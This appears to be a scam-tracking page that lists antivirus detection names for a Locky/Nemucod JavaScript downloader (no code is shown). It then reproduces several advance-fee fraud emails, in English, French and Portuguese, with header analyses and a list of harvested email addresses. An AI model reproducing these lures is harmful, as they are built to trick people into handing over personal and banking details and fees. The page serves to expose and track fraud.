Avira (no cloud) : JS/Dldr.Locky.98765
BitDefender : JS:Trojan.JS.Downloader.IQ
CAT-QuickHeal : JS.Locky.P
Cyren : JS/Locky.AC
DrWeb : JS.DownLoader.1397
ESET-NOD32 : JS/TrojanDownloader.Nemucod.WU
F-Prot : JS/Locky.AC
F-Secure : JS:Trojan.JS.Downloader.IQ
Fortinet : JS/Nemucod.WU!tr.dldr
GData : JS:Trojan.JS.Downloader.IQ
Ikarus : Trojan-Ransom.Script.Locky
Kaspersky : Trojan-Downloader.JS.Agent.kee
McAfee : JS/Nemucod.is
McAfee-GW-Edition : JS/Nemucod.is
eScan : JS:Trojan.JS.Downloader.IQ
Microsoft : TrojanDownloader:JS/Nemucod.EK
Rising : Downloader.Ransomware!8.625A-SOAAbihlG7H (Cloud)
Sophos : JS/Dldr-MD

Email analysis :

NOTE : lg46@valoritech.fr
NOTE : User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.7.0
NOTE : Received : from cmodem.201.140.226-163.wirenet.com.ar (unknown [201.140.226.163])

Godwin Emefiele

IMMEDIATE CONTRACT PAYMENT
CONTRACT #:MAV/NNPC/FGN/MIN/0015

From the records of outstanding contractors due for payment with the federal government of Nigeria. Your name and company was discovered as next on the list of the outstanding contractors who have not received their payments. I wish to inform you that your payment is being processed and will be released to you as soon as you respond to this letter. Also note that from my records your outstanding contract payment is US$15.9 Million Dollars. Please re-confirm to me if this is in line with what you have in your records and also re-confirm to me the following.

1) Your full name.
2) Telephone and fax number, if possible include you mobile telephone number.
3) Company name, position and address.
4) Profession, age and marital status.

As soon as this information is received, your payment will be made to you in a certified bank draft from the central bank of Nigeria and a copy will be given to you to take to your bank for confirmation. Please get back to us with the below email address:godwinemefiele@writeme.com

Regards,

Mr. Godwin Emefiele.

Email leaks :

godwinemefiele@writeme.com, DeberX@savebabies.net, Dr.ivorbigone@yahoo.co.uk, Dr_obaze.cure@yahoo.com, DrewPWiener2010@gmail.com, ELLASANCHEZ1809@gmail.com, ERROL_RODMAN@HOTMAIL.COM, Eatme95@Lycos.com, Edokuspiritualspelltemple@hotmail.c, Edokuspiritualspelltemple@HOTMAIL.COM, Ehicarespellhelp@gmail.com, Elitemobhackers@yahoo.com, EnloeMauicibre@HOTMAIL.COM, Erigospellcaster@gmail.com, FRANK@yahoo.com, FannyPlunge23@gmail.com, Fightagainstfascism@gmail.com, Fishhsif1962@aol.com, GOCHEZ25@MYWAY.COM, GUYMANMUGU@yahoo.com, Gert@metr.uk, Hosenas12@yahoo.com, IanDanielSmith@gmail.com, Ibe_Gettin@firehousemail.com, Igbalutempleofsolution1@gmail.com, Ivar.Knutsen@mimer.no, Ivorstiffun40@gmail.com, JMN2MIZZOU@aol.com, JOHN_REGAN_2000@yahoo.com, JRapallo@gmail.com, JSRGoldberg@gmail.com, Jake.Crowen@HOTMAIL.COM, Jason20906@yahoo.com, Jcsmbar@prysm.net, Jeff@softdisk.com, Joe.dumass1@gmail.com, Jonasarschfick@hushmail.com, Jonstonejames@gmail.com, Jose.Heleon@gmail.com, LELE75067@yahoo.com

Email analysis :

NOTE : godwin009@y28mail.com
NOTE : Received : from [185.56.137.14] by www.y28mail.com via HTTP;

QUE DIEU VOUS BÉNISSE

Bonjour bien aimé en Christ

J'ai pu vous contacter lors d'une petite balade dans mes moments perdus sur Internet suite à mes recherches , d'où j'ai trouvé votre expertise qui me permet de vous contacter de sorte. Je vous ai donc choisi par volonté de DIEU et non par simple hasard. Mon état de santé étant dégradé, j'envisage de vous faire donation de ma fortune de 2.500.000 € à la Banque Of Africa Bénin(BOA-BENIN) en Afrique de l'OUEST afin que vous puissiez réaliser des projets humanitaires (aide aux personnes vulnérables telles que: les enfants de la rue, les orphelins, les démunies sans-abri etc...)J'ai le cœur serein vu que je suis touchée par une maladie qui ne cesse de dégrader ma vie depuis près de trois ans dont je suis actuellement en sous observation médicale à Londres en Angleterre. Selon le Docteur la boule de sang qui s'est installée dans le cerveau est à un niveau très avancé et donc toute intervention chirurgicale serait un échec à l'avance. J'ai peur que le reste de mon argent soit un gâchis après mon décès. J'ai donc pris la décision d'arrêter le traitement. Veuillez me contactez directement dans mon mail: ginettebourgeois1948@gmail.com

QUE DIEU VOUS BÉNISSE
En attente de vous relire

Cordialement

Ginette Bourgeois

Email analysis :

NOTE : ginettebourgeois1948@gmail.com
NOTE : june_june0822@zeus.eonet.ne.jp
NOTE : X-Originating-Ip : [::ffff:41.86.234.171]


NOTE : Mime-Version : 1.0
NOTE : X-Mailer : Zimbra Mailer (ZimbraWebClient - GC50 (Win)/0.0)
NOTE : Received : from mta02.eonet.ne.jp (mta02.eonet.ne.jp. [2001:ce8:0:603::48])
NOTE : Received : from mailmbsb1mc4.mozu.eo.k-opti.ad.jp (mbs07.eonet.ne.jp [60.56.6.205])


NOTE : by mailauthmsa11.mozu.eo.k-opti.ad.jp
NOTE : QUE DIEU VOUS BÉNISSE

Charlotte Gomgnimbou

​Dear Friend,

I am Miss Charlotte Gomgnimbou.

A computer scientist with Central Bank Of Nigeria. I am 29 years old, just started work with Central bank of Nigeria . I came across your file which was marked X and your released disk painted RED, I took time to study it and found out that you have paid VIRTUALLY all fees and certificate but the fund has not been release to you.

The most annoying thing is that they cannot tell you the truth that on no account will they ever release the fund to you. Please this is like a Mafia setting in Nigeria; you may not understand it because you are not a Nigerian.
The only thing I will need to release this fund is a special HARD DISK we call it HD120 GIG. I will buy two of it, recopy your information, destroy the previous one, and punch the computer to reflect in your bank within 24 banking hours. I will clean up the tracer and destroy your file, after which I will run away from Nigeria to meet with you.

If you are interested. Do get in touch with me immediately, You should send to me your convenient tell/fax numbers for easy communications and also re confirm your banking details, so that there won't be any mistake.

Regards,
Miss Charlotte Gomgnimbou.

Email analysis :

NOTE : brasero@speedy.com.ar
NOTE : mrs.chaulotle@yahoo.fr
NOTE : client-ip=98.142.233.68;


NOTE : Received : from localhost (13k.terra.com [208.84.242.163])


NOTE : (authenticated user brasero!speedylm)
NOTE : by mail-smtp07-mia.tpn.terra.com (Postfix)

Larry John

Attention,

This is to inform you that I have registered your card valued $4.8 Million through courier company DHL, the registration code is: awb 33xzs. Kindly re-confirm your information to avoid wrong claim, your names, address, phone number and country. Write Dr. larry john and also call him on: +229 68947039,drlarryjohn1@gmail.com

I have paid for the Insurance & Delivery fee. The only fee you have to pay is their Security fee $100 Please indicate the registration Number and ask Him how to pay their Security fee of $100 so that you can pay it immediately.

Best Regards,

larryjohn

Email analysis :

NOTE : ronnie.dobbs123@gmail.com
NOTE : larryjohn@sfr.fr
NOTE : Received : from smtp2.tech.numericable.fr (smtp2.tech.numericable.fr. [82.216.111.38])


Received : from mowmail-nc5.nc.sdv.fr (mowmail-nc5.tech.numericable.fr [82.216.111.105]) by smtp2.tech.numericable.fr (Postfix)


Received : from [198.24.162.179] by webmail.numericable.fr with http webmail;

John Paul

ATATTENTION:BENEFICIARY,

WE THE MONEY GRAM REMMITTING OFFICE WERE HEREBY WRITE TO INFORM YOU THAT WE HAVE ALREADY SENT YOUR FULL COMPENSATION PAYMENT OF $4.5M TO YOU THROUGH MONEY GRAM, YOU WILL BE RECEIVING 10.000.00USD PER DAY, AND WE HAVE SEND THE FIRST PAYMENT TO YOU. SO CONTACT OUR DIRECTOR MR. PATRICK NNADIS AND ASK HIM TO GIVE YOU THE MONEY GRAM PAYMENT INFORMATION SO THAT YOU CAN BE ABLE TO PICK UP YOUR FUNDS

THROUGH MONEY GRAM WITHOUT ANY PROBLEM.

CONTACT HIM WITH THE BELLOW INFORMATION.

(moneygram11_@hotmail.com)
PHONE NUMBER (+22968574832)

AND CONTACT HIM WITH YOUR FULL INFORMATION.

Your name............
country.... ..........
phone ...........
address...............
city..........
age..................
sex..................

CALL OR EMAIL HIM NOW SO THAT HE CAN PROVIDE THE MONEY GRAM INFORMATION TO YOU AS SOON AS YOU CAN.

Thanks and Remain Blessed John Paul.
From Money Gramm.
YOUR FIRST PAYMENT THROUGH MONEY GRAM.

Email analysis :

NOTE : www.@wine.ocn.ne.jp
NOTE : moneygram11_@hotmail.com
NOTE : X-Originating-Ip : [41.138.89.195]

U.S HOMELAND SECURITY

Tele:+1 (952)388-5407 text messages only

I am Mr.Jeh Charles Johnson. The secretary of the U.S department of homeland security Washington DC,A consignment box which contains a fiscal cash of about $4.5m was brought to our office with your name as the beneficiary , so kindly reconfirm your full address, Full name, Phone number, and nearest Airport. so that you will come and claim it at our Head Office in Washington DC or we can send it to your designated address, I wait for your urgent and positive respond. You can reach me on this email as well: jehcharlesjohnson911@gmail.com

Email analysis :

NOTE : suntaxi.@alto.ocn.ne.jp
NOTE : jehcharlesjohnson911@gmail.com
X-Originating-Ip : [41.86.234.171]

donation

My wife and I have decided to share with you a piece of our life changing fund from the lotto we won EMAIL TO mrs.habrizah@hotmail.com

Email analysis :

NOTE : contact020@davidsfamly.com
NOTE : mrs.habrizah@hotmail.com
NOTE : X-Originating-Ip : [169.159.113.92]

GARANTIA OFERTA DE EMPRÉSTIMO INSCREVA-SE AGORA:

GARANTIA OFERTA DE EMPRÉSTIMO INSCREVA-SE AGORA:

STEWART J. FORD COMPANY tem dinheiro para emprestar aos interessados pessoas, investidores, empresas e.t.c de qualquer país para qualquer finalidade, com qualquer forma de crédito.

Você está na necessidade desesperada de fundos?
Você deseja uma casa ou um carro, mas não têm as finanças para adquiri-lo?
Você está na necessidade de fundos para o seu negócio imobiliário, a compra da propriedade ou estabelecimento projeto?
Você foi recusado por outros emprestadores ou Banks?
Você está na necessidade de fundos para pagar suas contas ou para a sua educação infantil?
Você está na necessidade de ajuda financeira para o arranque ou expansão ou para outros fins?

empresa STEWART J FORD Lending está concedendo-lhe a oportunidade de concretizar o seu dream.We ajudar a resolver o seu problema financeiro dentro de um curto período. Se você estiver interessado em um empréstimo, por favor contacte-nos através do endereço de e-mail abaixo para o seu pedido de empréstimo.

stewartfordj@gmail.com

Email analysis :

NOTE : bonifaciojoseph1@gmail.com
NOTE : stewartfordj@gmail.com